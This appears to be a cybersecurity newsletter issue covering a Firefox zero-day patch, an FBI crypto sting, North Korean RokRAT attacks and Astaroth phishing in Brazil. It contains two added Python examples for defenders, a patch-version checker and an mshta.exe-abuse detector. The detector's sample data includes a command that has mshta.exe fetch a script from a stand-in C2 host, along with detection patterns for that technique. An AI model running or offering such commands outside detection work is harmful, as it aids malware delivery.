🚨 FBI Creates Fake Cryptocurrency to Unmask Crypto Market Manipulation! 💰

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s sending our love down the phishing well ❤️🎣💀 All the way down!! 🐝 

Patch of the Week! 🩹

First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Mozilla, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

All Mozilla, no filler 🤘

🚨 Critical Firefox Flaw Under Active Attack – Update Now! ⚠️

Mozilla has patched a critical security vulnerability, CVE-2024-9680 (CVSS 9.8), impacting Firefox and Firefox ESR, which is being actively exploited in the wild! ⚠️ This use-after-free bug in the Animation timeline allows attackers to achieve remote code execution. 🚨💻 

Discovered by ESET’s Damien Schaeffer, the flaw is fixed in Firefox 131.0.2 and ESR versions 128.3.1 and 115.16.1. While details on real-world attacks are sparse, this could be used in watering hole or drive-by download campaigns. 🌐🔒

Even the Tor Browser has issued an emergency update to protect users from this threat (version 13.5.7). Mozilla shipped the fix within 25 hours of disclosure! 🔧💥 Update now to stay safe from these active exploits! 🛡️🔥 
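To turn the version numbers above into a fleet check, here is an added example (not Mozilla's or the newsletter's code) that flags hosts still below the fixed builds. The inventory rows are constructed, and it assumes ESR builds report an "esr" suffix in their version string.

```python
import re

# Fixed versions exactly as listed in the newsletter item above.
FIXED_RELEASE = (131, 0, 2)
FIXED_ESR = {128: (128, 3, 1), 115: (115, 16, 1)}
FIXED_TOR = (13, 5, 7)

def parse_version(text):
    """Return ((major, minor, patch), is_esr) for strings like '128.3.0esr'."""
    m = re.fullmatch(r"(\d+(?:\.\d+){0,2})(esr)?", text.strip().lower())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (3 - len(parts))  # '131.0' -> (131, 0, 0)
    return tuple(parts), m.group(2) is not None

def is_patched(product, version_text):
    """True if the build is at or above the fix for its own branch."""
    version, is_esr = parse_version(version_text)
    if product == "tor-browser":
        return version >= FIXED_TOR
    if product != "firefox":
        raise ValueError(f"unknown product: {product!r}")
    if not is_esr:
        return version >= FIXED_RELEASE
    if version[0] > max(FIXED_ESR):
        # Assumption: ESR branches cut after 128 descend from releases newer than 131.0.2.
        return True
    fixed = FIXED_ESR.get(version[0])
    # An ESR branch with no listed fix (e.g. 102) is reported as unpatched.
    return fixed is not None and version >= fixed

# Constructed inventory rows: (host, product, version string).
INVENTORY = [
    ("ws-01", "firefox", "131.0.2"),
    ("ws-02", "firefox", "130.0.1"),
    ("ws-03", "firefox", "128.3.0esr"),
    ("ws-04", "firefox", "115.16.1esr"),
    ("ws-05", "firefox", "102.15.1esr"),
    ("ws-06", "tor-browser", "13.5.6"),
]

def unpatched_hosts(inventory):
    """Hosts whose browser build predates the fix for its branch."""
    return [h for h, product, ver in inventory if not is_patched(product, ver)]

if __name__ == "__main__":
    print(unpatched_hosts(INVENTORY))
```
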

Now, on to this week’s hottest cybersecurity news stories: 

  • 🕵🏻 FBI creates fake cryptocurrency to expose crypto corruption 👨🏻‍💻

  • 🚀 N. Korean ScarCruft spreads RokRAT via Windows zero-day 🐀

  • 🎣 Brazil spear-phished by resurfaced Astaroth banking malware 💸

FBI, Robot… 🤖

🚨 FBI Creates Fake Cryptocurrency to Unmask Crypto Market Manipulation! 💰

💥 Crypto scammers, watch out! In a bold move, the FBI has taken down a widespread crypto fraud operation by creating a fake cryptocurrency, NexFundAI, to expose shady market manipulation. 🕵️‍♂️

🛠️ How It Worked

As part of Operation Token Mirrors, the FBI launched NexFundAI, a fake crypto token marketed as a bridge between finance and artificial intelligence. However, it was secretly a sting operation designed to uncover illegal trading activities like wash trading and pump-and-dump schemes. 🎣

🔍 Wash Trading Explained

In this scam, companies involved in the operation made fake trades with their own tokens to artificially inflate prices. This created a false sense of value, tricking investors into buying in, only for the fraudsters to sell at a profit, leaving everyone else in the dust. 💥💸

🛑 Who Got Caught?

The crackdown has led to charges against 18 individuals and entities, including market makers like ZM Quant and CLS Global, who conspired to manipulate prices. So far, $25 million in cryptocurrency has been seized, and several key players arrested in the U.S., U.K., and Portugal.

💼 What’s the Damage?

Fraudulent companies exploited investors by promising big returns, but it was all smoke and mirrors. Pump-and-dump scams flooded the market with fake value, leaving unsuspecting buyers with worthless assets.

⚠️ Stay Alert!

As the crypto market continues to grow, so do scams. Remember: not all that glitters is Bitcoin! Protect yourself from market manipulation by staying informed and cautious. 🚨

N. Korean Scarts and Crufts 🎨 

🚨 North Korean Hackers Exploit Windows Flaw to Spread RokRAT Malware! 🖥️💥

🔓 ScarCruft Strikes Again! The North Korean threat group ScarCruft (aka TA-RedAnt) has been caught exploiting a zero-day flaw in Windows, using it to spread the dangerous RokRAT malware. 🚨

🛠️ The Vulnerability

The bug, known as CVE-2024-38178, is a memory corruption flaw in Windows' Scripting Engine with a CVSS score of 7.5. The vulnerability allows for remote code execution when users open a malicious link in Edge's Internet Explorer mode. It was patched in August 2024, but attackers were already exploiting it before the update arrived.

📩 Operation Code on Toast

The attack, dubbed Operation Code on Toast by South Korean cybersecurity researchers, targeted toast ads (pop-up notifications) bundled with free software in Korea. Threat actors compromised an ad server and injected malicious code into the ad content to infect users. 🔥

🦠 RokRAT Malware in Action

Once the vulnerable toast program downloaded the infected ad, users were hit with RokRAT. This malware can spy on your files, control your processes, and steal data from apps like KakaoTalk, WeChat, and web browsers. What makes it even sneakier? It uses trusted cloud services like Dropbox and Google Cloud to communicate with its command-and-control server, blending in with regular traffic. 🌩️

🔐 Stay Safe!

ScarCruft has a history of exploiting Internet Explorer flaws. To protect yourself, always keep your system and software up to date, especially if you're using any legacy programs. Hackers are always evolving—don’t let your system become their next target! 🎯

It’s the AstaRothstein of banking malware 🧔🏻 

🚨 New Spear-Phishing Campaign Targets Brazil w/ Astaroth Banking Malware 💰💻

🛑 Brazil Under Attack! A spear-phishing campaign targeting various industries in Brazil is spreading the notorious Astaroth banking malware (also known as Guildma) through obfuscated JavaScript to evade security defences. 🦠

💼 Targeting Businesses and Government

The attack, dubbed Water Makara by Trend Micro, has been aimed at manufacturing companies, retail firms, and government agencies, using fake tax document emails to trick victims. Posing as official messages from Receita Federal, the emails urge recipients to download malware disguised as personal income tax files. 📑

💣 How It Works

The phishing emails deliver a ZIP file containing a malicious Windows shortcut (LNK), which abuses the legitimate mshta.exe utility to run obfuscated JavaScript. This sneaky script connects to a command-and-control (C2) server, where the real damage begins: devices are infected with the evolving Astaroth malware. 🔗
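For defenders, the LNK-to-mshta.exe step described above is visible in process-creation telemetry. The following added example (not from Trend Micro or the newsletter) triages such events; the event field names, hosts, paths and command lines are all constructed for illustration.

```python
import ntpath
import re

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_PROTOCOL = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
# Parents expected when a user opens a shortcut or a shell runs it.
USER_SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe"}

def mshta_findings(event):
    """Return the reasons a process-creation event looks like mshta.exe abuse."""
    if ntpath.basename(event["image"]).lower() != "mshta.exe":
        return []
    reasons = []
    cmd = event["command_line"]
    if REMOTE_URL.search(cmd):
        reasons.append("remote-url-argument")      # content fetched from the network
    if SCRIPT_PROTOCOL.search(cmd):
        reasons.append("inline-script-argument")   # script passed on the command line
    # The parent only matters once the arguments are already suspicious.
    if reasons and ntpath.basename(event["parent_image"]).lower() in USER_SHELLS:
        reasons.append("user-shell-parent")
    return reasons

# Constructed sample events (hypothetical field names, hosts and paths).
EVENTS = [
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "https://c2.example.invalid/x"'},
    {"host": "ws-02", "parent_image": r"C:\Program Files\Vendor\installer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},
    {"host": "ws-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\MSHTA.EXE",
     "command_line": "MSHTA.EXE javascript:/*constructed placeholder*/"},
    {"host": "ws-04", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe https://example.invalid/readme"},
]

def triage(events):
    """Map host -> reasons for every event that produced at least one finding."""
    return {e["host"]: r for e in events if (r := mshta_findings(e))}

if __name__ == "__main__":
    for host, reasons in triage(EVENTS).items():
        print(host, ", ".join(reasons))
```

The local `.hta` launched by an installer (ws-02) is deliberately left unflagged, which keeps legitimate mshta.exe use out of the alert queue.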

🏦 Astaroth Banking Trojan

Though Astaroth has been around for a while, it’s still evolving and continues to be a serious threat. Once on your system, the malware steals sensitive banking data, leading to financial losses and long-term damage to consumer trust. It also causes business disruptions, from downtime to recovery costs, making it a major headache for affected companies. 😨

🛡️ Top Tips

To protect yourself from this and similar attacks, make sure to:

  • Enforce strong password policies 🔑

  • Use multi-factor authentication (MFA) 🔐

  • Keep your software and security solutions updated 🛡️

  • Apply the principle of least privilege (PoLP) to minimise risk 📉

🚫 Don't let your business fall victim to Water Makara! Stay vigilant and cautious with any unsolicited emails, especially those that seem urgent or too official. 💼

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
